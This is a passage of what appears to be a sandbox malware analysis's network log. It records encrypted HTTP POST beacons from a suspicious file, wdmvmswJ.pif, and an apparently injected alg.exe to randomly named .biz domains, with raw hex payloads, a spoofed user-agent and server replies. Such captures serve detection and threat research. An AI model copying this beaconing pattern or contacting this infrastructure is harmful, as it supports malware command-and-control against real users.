                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        42192.168.2.84975744.221.84.105804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.769706011 CET346OUTPOST /m HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.769706011 CET778OUTData Raw: 25 d9 c5 97 50 cb d7 e7 fe 02 00 00 26 28 f2 dc be ef d6 76 14 75 82 89 76 4a 4f a7 2d 4a ed 56 df 29 b3 ff b0 09 e6 ce b4 79 6e 5f 44 9b 1f 2d 6c ec 3a 8a 9e f2 e2 ad 29 fa 6d 55 fe e8 b6 19 58 40 5d b2 bb 2c f4 b6 3c 95 71 54 10 e5 e1 fd 63 3f
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: %P&(vuvJO-JV)yn_D-l:)mUX@],<qTc?(;kivEP7NR%#\w?8u1rDd6L_$L`Z1X,E2ZwEj_cAQvoSRg&m,IqK`!Et}<


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        43192.168.2.84975854.244.188.177804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.889302969 CET352OUTPOST /rifyadu HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:02.889317989 CET802OUTData Raw: 16 ed a2 44 cf c8 3e 2d 16 03 00 00 3a ab 20 04 f0 d5 ca c3 33 6d 1b ce 91 01 02 d6 30 cd cb eb 59 13 ac 62 2b 8c c4 34 13 1f 4c fb 98 f9 1a d7 55 54 95 e0 8e 13 ce 34 e6 f5 e0 85 b6 1f 01 50 76 c3 53 91 4c 10 cb a2 87 cf a2 fd 01 b6 72 b7 a9 1b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: D>-: 3m0Yb+4LUT4PvSLr\QR[lz(P{xf:aa71m4Y4RXj[~wi'{Ck)xp;S%2S|EFuFP0&E2.\Z2c/]+s#~>S,,


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        44192.168.2.84975954.244.188.177804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.063754082 CET349OUTPOST /lauq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: oshhkdluh.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.063786983 CET802OUTData Raw: 93 eb 7d ad 5a c8 8d c4 16 03 00 00 65 8b b7 cd ce eb c1 a9 97 63 3a 07 84 46 63 bd a4 dc 4c b8 fa b0 b2 f5 47 31 dc 62 de 40 aa c4 bb 83 8f 97 5c e7 28 32 a1 8f 36 67 e8 0b 25 30 dd f3 69 f7 15 62 49 05 8b 7b f4 b9 19 b0 f3 2f 11 46 0f 22 63 8c
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: }Zec:FcLG1b@\(26g%0ibI{/F"cFwjX.`AEmFHDJJ+(<p*eTtA4&=v1us^Q)T';%wARPlx_1,J&z*BfxFWSh8y 1c]
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.898284912 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=41e55ea1ec11dd13caf62bbe0de80329|173.254.250.82|1730445843|1730445843|0|1|0; path=/; domain=.oshhkdluh.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        45192.168.2.84976044.221.84.105804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.239578962 CET358OUTPOST /owesbtnhccxha HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.239610910 CET778OUTData Raw: 6c ab db 34 5f 6a 14 65 fe 02 00 00 30 01 ec 78 7f 71 cf 99 a4 de 19 5b 49 b7 fa 06 5a 2e ab 0a 05 a6 f1 9a 63 e2 0c bf e8 36 3a 5a f9 fe ca 51 0a 37 0a 33 75 8d 2b f2 19 42 63 f4 74 fb dc b9 cc 42 27 1c 96 97 a3 41 92 59 61 0e e3 54 07 ea c8 e5
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: l4_je0xq[IZ.c6:ZQ73u+BctB'AYaTx#T\|#,?Or;M|sjH9@U84ECi~1BA%`1srD)I/-LJsCGvZ*oM[M ^R=,}4dh-EXmA{W_
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.898834944 CET417INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=1ae457f87c0a29403c8a946c86c9d457|173.254.250.82|1730445843|1730445843|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        46192.168.2.849761208.100.26.245804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.951025963 CET346OUTPOST /rte HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:03.951046944 CET802OUTData Raw: 03 f5 3d fe 1d 0a 1b 50 16 03 00 00 8b f5 65 d7 03 3c 92 b0 8b 37 9d d7 b2 84 7e eb 57 54 36 f9 38 1e 52 1c 2c 6f 80 68 6f ce 34 35 78 a9 a2 81 83 ee e1 29 9f a5 32 87 27 bc 1e 08 cd 1f fe d7 da ef 17 52 99 78 a6 a8 bd 39 69 5a 10 bb c9 80 c9 4b
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: =Pe<7~WT68R,oho45x)2'Rx9iZKt9B2!dEKtK2Ul+0PUWHb?CRIN^R(<\c|:|{m5x[*vb'DJ)xA0rol2b.1Yf\8"X-*(T;X
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.595192909 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.607525110 CET344OUTPOST /x HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: yunalwv.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.607559919 CET802OUTData Raw: e0 d5 0b db 08 dc be ab 16 03 00 00 1a d6 96 6f 3f 39 fd 18 b0 58 bb 50 cb 8b 7a 03 18 7e 73 a4 78 0d 6b 52 77 00 03 a2 a1 6f 9c 59 59 39 42 2b 6a 7a e1 05 ab a5 4b 07 04 f7 0e e5 78 d4 2b 21 35 a9 e8 fe 2a 04 c7 e2 ae b3 81 4c 1c 8d 91 77 92 48
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: o?9XPz~sxkRwoYY9B+jzKx+!5*LwHTiVjrFlus*^'&O.~f&='9T2k_0xJ_Py=KLg~^jwdegpJWE`bcK (=rqx:cm}8_VEG^d TH
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.754420042 CET744INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx/1.14.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:04 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 580
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 [TRUNCATED]
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        47192.168.2.84976218.141.10.107804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.031634092 CET344OUTPOST /p HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.031647921 CET778OUTData Raw: 2a 4d fe cf 20 8c 1d 1b fe 02 00 00 47 5c b6 0d 23 cb 57 a0 94 74 4e 56 00 e1 b9 e8 78 94 0c dc 5a 7e 11 a8 a3 66 46 36 a1 fd 94 77 d0 ae 3f ee 32 2a 2d fc 51 fe 84 c1 d2 15 e1 33 67 25 62 37 11 82 8c 41 89 93 4c 6e bb 6b e0 f8 b7 ed d4 7d 32 53
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: *M G\#WtNVxZ~fF6w?2*-Q3g%b7ALnk}2SY|f )I7Br@2B,bL5ygBx<73tZFK?Yp+Yf:Wt))iKaSeqCqN6pQ;H
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.524547100 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=5ad3bde7d6d8327629d7b578e296ebd4|173.254.250.82|1730445845|1730445845|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        48192.168.2.84976334.211.97.45804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.798916101 CET356OUTPOST /ceabvuhcchcwyyq HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: jpskm.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:04.798916101 CET802OUTData Raw: 8e 9c a0 39 f1 f1 6b bd 16 03 00 00 5b 10 a8 bd 29 0f 15 47 b8 0f 29 81 7d ba 0b 3c c4 9d 68 17 da ff 8b 44 bd 21 eb 08 65 5b 97 b6 13 ed 6a ce 62 90 49 4d 62 a7 af 26 ca 49 1a 1f d1 31 57 c1 25 2a b2 4c 2b 28 37 d3 34 7d 81 0b 01 7b 7f 71 5b 2a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 9k[)G)}<hD!e[jbIMb&I1W%*L+(74}{q[*K&!:PAKaLmh5=d1oRDO\xyss3)3c!-PS:UBVq#uJ57]s*3<=sFs*%)BdiZ:\oH]>.F
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.630702019 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:05 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=fe0dee08aaa6a456f7bed84c23085338|173.254.250.82|1730445845|1730445845|0|1|0; path=/; domain=.jpskm.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        49192.168.2.849764172.234.222.143804916C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.631436110 CET355OUTPOST /gcfjbafgheaeck HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: fwiwk.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.631448030 CET778OUTData Raw: 7f ed 5f 89 78 94 fc 3f fe 02 00 00 81 5c 1d c4 b9 26 9c 29 a7 d3 2b 6d d9 45 8d 43 66 a2 9a 05 ca 0b 25 a8 61 7c cb 2d ba 29 b2 4b 1b 06 0c c8 32 53 06 bc 67 f4 5a 79 f5 65 5d 55 0f 98 66 fe de 7b 32 74 a8 49 6c 20 c0 03 39 3b 2f bd 2e 67 6a e2
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: _x?\&)+mECf%a|-)K2SgZye]Uf{2tIl 9;/.gj(zchQ^fN"+HYOL2SHQza`zUMIC@cqvOzc.7hOs%KHC}@{*M-3X{Cx0VIn, KU/=P/`~


                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                        50192.168.2.84976554.244.188.177804536C:\Users\Public\Libraries\wdmvmswJ.pif
                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.661675930 CET352OUTPOST /uextgbni HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                        Host: lrxdmhrr.biz
                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 802
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:05.661700964 CET802OUTData Raw: 67 33 66 75 06 0a 08 60 16 03 00 00 50 22 90 e9 07 68 2a de fb 7f ac 24 a6 7c 2c 15 79 c1 f1 49 e4 35 fe 9c 8f bc 05 97 3f e1 e5 85 82 00 89 06 76 28 18 c2 b4 c6 e6 47 88 be 23 7b d5 5c 11 32 b1 44 65 e3 fa a3 12 fc 68 c4 2f 74 66 60 9a 35 f0 f9
                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: g3fu`P"h*$|,yI5?v(G#{\2Deh/tf`5suIY1zAg1zQVbd\hH60&g%RKv##VMj p;Mv4J!m)Qd5WV0&_N7]_6%jd$ae
                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 1, 2024 08:24:06.499507904 CET416INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Fri, 01 Nov 2024 07:24:06 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=164f5cd5a705e8acd9dec05cac632db7|173.254.250.82|1730445846|1730445846|0|1|0; path=/; domain=.lrxdmhrr.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=173.254.250.82; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
